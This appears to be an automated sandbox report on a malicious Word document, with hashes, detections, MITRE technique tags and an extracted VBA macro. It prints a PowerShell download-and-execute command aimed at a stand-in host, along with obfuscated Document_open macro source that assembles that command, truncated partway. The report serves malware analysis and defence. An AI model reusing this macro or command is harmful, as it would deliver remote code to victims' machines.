Office (OLE) malware analysis — malicious · 73dc059214ae7f2c

MALICIOUS

Office (OLE)

249.2 KB Created: 2018-07-11 06:54:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: fbe429e3562d5a08a27c55db091e81c0 SHA-1: 3841b2f284464d0f92d677c4e5fcb1fe390a06dc SHA-256: 73dc059214ae7f2c13de2f8564b68e382075051147590c4a723751e810c90fa9

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro executes a PowerShell command, reconstructed as 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://evil.com/payload\')"', which downloads and executes a second-stage payload from a remote URL. This indicates a dropper functionality, commonly associated with malware distribution.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6607279-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6607279-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16991 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16991 bytes
SHA-256: `18cfd33f2f0148d0ff94bf3baa649a2e017bed46b84665ed0d7dbfdc86a4274f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "RChzliW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next QrYck = 11882 / WjDwSN - (KhzaSW + sHkZCM) cYjoD = 64430 / nOFhfz - (mlXuM + akiFTp) dzslqVsvKJ ("" + VQVECYJFNUv + CQjucDmVf + blZCdWHZO + DBZVs + roflTVj + jnXwjvQot + WGpNvbi + CfaHhJUkmk) jDXtiH = 59731 / HwjkK - (oGQUp + dSjCh) ObSFw = 85095 / iUNYKm - (zrSCiI + CshXTD) End Sub Attribute VB_Name = "jlhfpZul" Function blZCdWHZO() On Error Resume Next dvWSK = (oPuhXq - aoGiRl) LlHYk = (FzbUuo - mzKsK) iQuNbLv = "pow" + iwilHAUD + McZQOoNsCpFtz + "ers" + twqjbYzY + YoZkovqBi + "h" + AYrpDtw + oBacOBi + "ell" + TPDGCqA + OuOsSaEt + " " + qXfwYMYXNwVmQT + OztVBpPl + "&" + rwjAYUb + ioQfuiTmrmcd + " " + GLFzFwBHuOTVcn + BLlmNWwUzr + "( $" + YzHbvzc + VVifauBMY + "sh" + YSkQsJjjNlz + wjuGrZdLY + "el" + qCGmcwIbpCi + rjmPsbhVH + "Lid" rzvUwY = 38481 / 952 + (FapCw - 13796 * 32357 - YYMTij) oOkdmknNMS = "[1]" + NTwYJiiYvdBnc + dsIRtjSlKEzi + Chr(43) + "$" + MSfMKKADo + HiBdPpvHdqmXw + "SH" + uhlTMAa + KVaRGhZDNZmF + "El" + vPBaiXav + GQTRVjqjSSTtOd + "L" + QiKYczcaqDKawn + obLqOHidi + "Id" + zoBAXYiHrkIW + tbRYQkiJDFmSL + "[1" + AjqWNdlo + BNjQifFFDVjRF + "3]" + HqkwNFNAwr + ztKHnOkOW + Chr(43) + "'x" + YahMHMbjbXBFm + phnMhZaMFLtOt + "')(" + EwJwMWjsGo + cvwnXGuY + "n" + JQSzNbAOzij + CvooWIohY + "eW-" + wRHYVHwiR + tfOJFsrqocWbv + "Ob" + RYQOslFBzvUc + jBppNCJaNDwqh + "JE" + bpLfmqaNDlEod + lPzAEahmi + "cT " + qLMRBEjMYFI + AJnmEIOf + "s" ShsjRO = 89938 / 7115 + (pMzOBl - 67446 * 99626 - QqIcS) vmvhZ = 53738 / 89717 + (MukJYR - 96483 * 56270 - fGuAu) VJIOW = 82339 / 80834 + (BfWcz - 42165 * 5788 - RVCHA) HfXzYpBNDNw = "YS" + SMGwLwAAzuMQT + VEVHsvVd + "TE" + tcisfzvhVvJ + CFfVcFJmulNhD + "m." + jswjbUSTV + uQjzkwlKSC + "iO" + tYWqwrRLcU + cwaIZklJNIKsDw + "." + vsMQWTDLE + cEzranlVlX + "s" + iQDLkNdnBqBP + NbJvPDvQ + "t" + QQkFRbP + GdzSHTzbq + "re" + DhHRaJLqIYqS + vTdXVZaJvdiNJC + "Am" + cFzXCiJSf + ZjuQKtVMz + "rEA" + UsLtmin + JNrwlVi + "d" + KLsNKAaB + UnqdwYkELI + "ER" + fSHGMswfpKZ + HLHiLTkQTsMTk + "( " + ARXmQfjZFD + CiiKOqoqMdVA + "(" + OMavmbza + nnjIalBfXl + " ne" jQabq = DdfXsw + fzPGc * 31349 - iqFnqO / CGiiK / VPlkw / 11079 * ublzFN ohwcvB = 21222 / 45505 + (WzERUw - 20243 * 32225 - ibDFX) Tkkrmtukntt = "W" + MzcGlcpKnkbR + BoiZoQMfKW + "-" + DFIhdHiSuhFDls + wLicuEkJXoR + "Ob" + jmGkrZkBGH + icUiinwqljzst + "JE" + VzJoqOuNuzTuTp + DKoMcQatAVZmz + "cT" + qqbOCzSdZ + ZiLtdBMuv + " " + oVFYQoV + QHmcEraW + "s" + hPYNqshHrXZC + lCFJihiHkfw + "yS" + jplaqCJApPHOfi + RiNPHqBmRsK + "tE" + itPYzwSFzj + dwmzvwzzdTwk + "m.I" + tnzJzsCbKWspi + XUzNhitPo + "o" + KJvLwiVJFfGnlG + lPFFPPi + ".C" lwoSkQ = irWdY + mRpnb * 10060 - ZXbWj / hPEVLp / nKcBtO / 84491 * ROkRbI hzNnT = NWRlE + DdWLnu * 73512 - potMNm / IrFFW / vWVzCK / 42189 * FjHJJd zWVJzX = nDitf + aNTZij * 33894 - NGCbHA / PivbpM / HAzGHu / 99150 * YmXmps rKujzVni = "OM" + djWJfsFBaj + fMjhmIG + "PRe" + ljQfjEmCD + QSbYAlQiPw + "SsI" + LsZXbbXUjrK + FdvoTwWYqoNkHh + "On" + clSJGEnKjLafo + HjbuHUpvzF + ".d" + DMnTuWcDGs + BqkHIXqjDPFAj + "e" + XnpUEAjjztrjJ + RPBktRkinaOV + "F" + GnmIiFQRXdqSG + QrhYVzpzv + "LAT" + nFCupiRvqFE + GSAsXubLwTW + "e" + zwqRorPDRLOd + AKwIMSDR + "StR" + zbBRPqljKJhVFZ + IboGlOjja + "e" wEFww = ULFBCw + kUXHZl * 97422 - YzcCs / kazoQ / HmnNu / 34359 * GKodz KJQdf = sTMpzo + ZiSidi * 9223 - qwKbd / LisSqO / aWufBc / 24484 * FYKnM BjdlBnCX = "Am" + lADNbirYFc + NjlGNlj + "([" + jKMIZsAjVcVMvz + bohPOhkANwXZiQ + "s" + FXEqrFBqqokzYr + LKmwzKjwZLua + "y" + BEPVHXuiEVn + azkcWjnOXi + "sTe" + voGRfKa + nfkCjupcG + "M." XKBKiF = mbVioJ + IkbNMs * 56481 - EipcY / hGiNPs / bvaiI / 16605 * iJWnm IlIBo = YuhNia + VMjoRY * 21051 - VJnSA / mlzlQ / GsKfF / 54166 * mjnCIE cazkzWsd = "IO" + avssDVF + FhSEUrVZRW + "." + AiDjXTvMCqXHi + VWptVcFdbqAN + "M" + NU ... (truncated)

SHA-256: 18cfd33f2f0148d0ff94bf3baa649a2e017bed46b84665ed0d7dbfdc86a4274f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "RChzliW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   QrYck = 11882 / WjDwSN - (KhzaSW + sHkZCM)
   cYjoD = 64430 / nOFhfz - (mlXuM + akiFTp)
dzslqVsvKJ ("" + VQVECYJFNUv + CQjucDmVf + blZCdWHZO + DBZVs + roflTVj + jnXwjvQot + WGpNvbi + CfaHhJUkmk)
   jDXtiH = 59731 / HwjkK - (oGQUp + dSjCh)
   ObSFw = 85095 / iUNYKm - (zrSCiI + CshXTD)
End Sub


Attribute VB_Name = "jlhfpZul"
Function blZCdWHZO()
On Error Resume Next
dvWSK = (oPuhXq - aoGiRl)
   LlHYk = (FzbUuo - mzKsK)
iQuNbLv = "pow" + iwilHAUD + McZQOoNsCpFtz + "ers" + twqjbYzY + YoZkovqBi + "h" + AYrpDtw + oBacOBi + "ell" + TPDGCqA + OuOsSaEt + " " + qXfwYMYXNwVmQT + OztVBpPl + "&" + rwjAYUb + ioQfuiTmrmcd + " " + GLFzFwBHuOTVcn + BLlmNWwUzr + "( $" + YzHbvzc + VVifauBMY + "sh" + YSkQsJjjNlz + wjuGrZdLY + "el" + qCGmcwIbpCi + rjmPsbhVH + "Lid"
rzvUwY = 38481 / 952 + (FapCw - 13796 * 32357 - YYMTij)
oOkdmknNMS = "[1]" + NTwYJiiYvdBnc + dsIRtjSlKEzi + Chr(43) + "$" + MSfMKKADo + HiBdPpvHdqmXw + "SH" + uhlTMAa + KVaRGhZDNZmF + "El" + vPBaiXav + GQTRVjqjSSTtOd + "L" + QiKYczcaqDKawn + obLqOHidi + "Id" + zoBAXYiHrkIW + tbRYQkiJDFmSL + "[1" + AjqWNdlo + BNjQifFFDVjRF + "3]" + HqkwNFNAwr + ztKHnOkOW + Chr(43) + "'x" + YahMHMbjbXBFm + phnMhZaMFLtOt + "')(" + EwJwMWjsGo + cvwnXGuY + "n" + JQSzNbAOzij + CvooWIohY + "eW-" + wRHYVHwiR + tfOJFsrqocWbv + "Ob" + RYQOslFBzvUc + jBppNCJaNDwqh + "JE" + bpLfmqaNDlEod + lPzAEahmi + "cT " + qLMRBEjMYFI + AJnmEIOf + "s"
ShsjRO = 89938 / 7115 + (pMzOBl - 67446 * 99626 - QqIcS)
   vmvhZ = 53738 / 89717 + (MukJYR - 96483 * 56270 - fGuAu)
   VJIOW = 82339 / 80834 + (BfWcz - 42165 * 5788 - RVCHA)
HfXzYpBNDNw = "YS" + SMGwLwAAzuMQT + VEVHsvVd + "TE" + tcisfzvhVvJ + CFfVcFJmulNhD + "m." + jswjbUSTV + uQjzkwlKSC + "iO" + tYWqwrRLcU + cwaIZklJNIKsDw + "." + vsMQWTDLE + cEzranlVlX + "s" + iQDLkNdnBqBP + NbJvPDvQ + "t" + QQkFRbP + GdzSHTzbq + "re" + DhHRaJLqIYqS + vTdXVZaJvdiNJC + "Am" + cFzXCiJSf + ZjuQKtVMz + "rEA" + UsLtmin + JNrwlVi + "d" + KLsNKAaB + UnqdwYkELI + "ER" + fSHGMswfpKZ + HLHiLTkQTsMTk + "( " + ARXmQfjZFD + CiiKOqoqMdVA + "(" + OMavmbza + nnjIalBfXl + " ne"
jQabq = DdfXsw + fzPGc * 31349 - iqFnqO / CGiiK / VPlkw / 11079 * ublzFN
   ohwcvB = 21222 / 45505 + (WzERUw - 20243 * 32225 - ibDFX)
Tkkrmtukntt = "W" + MzcGlcpKnkbR + BoiZoQMfKW + "-" + DFIhdHiSuhFDls + wLicuEkJXoR + "Ob" + jmGkrZkBGH + icUiinwqljzst + "JE" + VzJoqOuNuzTuTp + DKoMcQatAVZmz + "cT" + qqbOCzSdZ + ZiLtdBMuv + " " + oVFYQoV + QHmcEraW + "s" + hPYNqshHrXZC + lCFJihiHkfw + "yS" + jplaqCJApPHOfi + RiNPHqBmRsK + "tE" + itPYzwSFzj + dwmzvwzzdTwk + "m.I" + tnzJzsCbKWspi + XUzNhitPo + "o" + KJvLwiVJFfGnlG + lPFFPPi + ".C"
lwoSkQ = irWdY + mRpnb * 10060 - ZXbWj / hPEVLp / nKcBtO / 84491 * ROkRbI
   hzNnT = NWRlE + DdWLnu * 73512 - potMNm / IrFFW / vWVzCK / 42189 * FjHJJd
   zWVJzX = nDitf + aNTZij * 33894 - NGCbHA / PivbpM / HAzGHu / 99150 * YmXmps
rKujzVni = "OM" + djWJfsFBaj + fMjhmIG + "PRe" + ljQfjEmCD + QSbYAlQiPw + "SsI" + LsZXbbXUjrK + FdvoTwWYqoNkHh + "On" + clSJGEnKjLafo + HjbuHUpvzF + ".d" + DMnTuWcDGs + BqkHIXqjDPFAj + "e" + XnpUEAjjztrjJ + RPBktRkinaOV + "F" + GnmIiFQRXdqSG + QrhYVzpzv + "LAT" + nFCupiRvqFE + GSAsXubLwTW + "e" + zwqRorPDRLOd + AKwIMSDR + "StR" + zbBRPqljKJhVFZ + IboGlOjja + "e"
wEFww = ULFBCw + kUXHZl * 97422 - YzcCs / kazoQ / HmnNu / 34359 * GKodz
   KJQdf = sTMpzo + ZiSidi * 9223 - qwKbd / LisSqO / aWufBc / 24484 * FYKnM
BjdlBnCX = "Am" + lADNbirYFc + NjlGNlj + "([" + jKMIZsAjVcVMvz + bohPOhkANwXZiQ + "s" + FXEqrFBqqokzYr + LKmwzKjwZLua + "y" + BEPVHXuiEVn + azkcWjnOXi + "sTe" + voGRfKa + nfkCjupcG + "M."
XKBKiF = mbVioJ + IkbNMs * 56481 - EipcY / hGiNPs / bvaiI / 16605 * iJWnm
   IlIBo = YuhNia + VMjoRY * 21051 - VJnSA / mlzlQ / GsKfF / 54166 * mjnCIE
cazkzWsd = "IO" + avssDVF + FhSEUrVZRW + "." + AiDjXTvMCqXHi + VWptVcFdbqAN + "M" + NU
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.